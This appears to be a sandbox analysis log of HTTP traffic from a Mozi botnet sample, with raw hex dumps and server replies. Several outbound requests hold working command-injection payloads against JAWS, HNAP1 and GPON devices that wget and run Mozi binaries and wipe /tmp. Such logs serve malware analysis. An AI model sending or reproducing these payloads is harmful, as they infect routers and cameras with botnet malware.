                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#h
                                                                                                        Jan 6, 2021 15:01:24.033241034 CET1275INHTTP/1.1 400 Bad Request
                                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                        Date: Wed, 06 Jan 2021 14:01:22 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 326
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 56 65 72 62 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 76 65 72 62 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Verb</h2><hr><p>HTTP Error 400. The request verb is invalid.</p></BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        33192.168.2.2053646184.31.173.8180
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:01:23.725990057 CET1268OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 184.31.173.81:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                        Jan 6, 2021 15:01:23.922187090 CET1274INHTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 209
                                                                                                        Expires: Wed, 06 Jan 2021 14:01:23 GMT
                                                                                                        Date: Wed, 06 Jan 2021 14:01:23 GMT
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 34 31 38 61 65 38 63 26 23 34 36 3b 31 36 30 39 39 34 31 36 38 33 26 23 34 36 3b 62 37 30 65 64 62 66 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;2418ae8c&#46;1609941683&#46;b70edbf1</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        34192.168.2.205565238.87.83.3480
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:01:30.654612064 CET1308OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 38.87.83.34:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        35192.168.2.204681623.218.148.13880
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:01:37.647290945 CET1341OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 23.218.148.138:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 15:01:37.779865026 CET1342INHTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 248
                                                                                                        Expires: Wed, 06 Jan 2021 14:01:37 GMT
                                                                                                        Date: Wed, 06 Jan 2021 14:01:37 GMT
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 48 4e 41 50 31 26 23 34 37 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 34 36 35 33 33 62 38 26 23 34 36 3b 31 36 30 39 39 34 31 36 39 37 26 23 34 36 3b 33 39 35 38 30 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;HNAP1&#47;", is invalid.<p>Reference&#32;&#35;9&#46;446533b8&#46;1609941697&#46;39580f</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        36192.168.2.205938245.195.180.14180
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:01:37.824611902 CET1342OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 15:01:38.117810011 CET1343INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Jan 2021 14:01:37 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 146
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                        Jan 6, 2021 15:01:38.117842913 CET1344INHTTP/1.1 400 Bad Request
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Jan 2021 14:01:37 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 150
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        4192.168.2.2039582190.186.252.628080
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:57:56.798078060 CET236OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:8080
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        5192.168.2.2052344107.154.165.23480
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:07.539832115 CET281OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 14:58:07.580197096 CET282INHTTP/1.1 503 Service Unavailable
                                                                                                        Content-Type: text/html
                                                                                                        Cache-Control: no-cache, no-store
                                                                                                        Connection: close
                                                                                                        Content-Length: 681
                                                                                                        X-Iinfo: 13-47382215-0 0NNN RT(1609941487307 54) q(0 -1 -1 -1) r(0 -1)
                                                                                                        Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 33 2d 34 37 33 38 32 32 31 35 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 30 39 39 34 31 34 38 37 33 30 37 25 32 30 35 34 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 39 31 30 39 32 34 38 34 33 33 36 31 38 39 35 38 31 26 65 64 65 74 3d 32 32 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 